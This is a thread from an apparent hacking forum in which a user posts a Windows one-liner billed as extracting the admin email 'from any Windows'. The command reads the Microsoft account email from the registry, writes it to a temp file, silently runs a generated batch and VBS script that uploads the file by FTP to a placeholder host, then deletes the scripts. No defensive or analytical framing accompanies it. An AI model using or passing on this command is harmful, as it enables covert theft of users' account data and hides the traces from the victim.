• šŸŒ™ Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

Extract Windows Admin Email From Any Windows With This Code (1 Viewer)

Currently reading:
 Extract Windows Admin Email From Any Windows With This Code (1 Viewer)

Recently searched:

Rabokona

Member
LV
1
Joined
Dec 18, 2022
Threads
43
Likes
36
Awards
4
Credits
4,587Ā©
Cash
0$
šŸ”»Code:-
(echo reg query HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\UserExtendedProperties\>c:\windows\temp\windows-email.txt && echo @ftp -i -s:"%~f0"^&GOTO:EOF & echo open 127.0.0.1 & echo 1 & echo 1 & echo binary & echo put "c:\windows\temp\windows-email.txt" & echo disconnect & echo bye & echo quit) > %temp%\5.bat && echo Set objShell = WScript.CreateObject("WScript.Shell") > %temp%\5.vbs && echo objShell.Run("%temp%\5.bat"), 0, True >> %temp%\5.vbs && %temp%\5.vbs && del /f /q %temp%\5.bat && del /f /q %temp%\5.vbs && exit
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom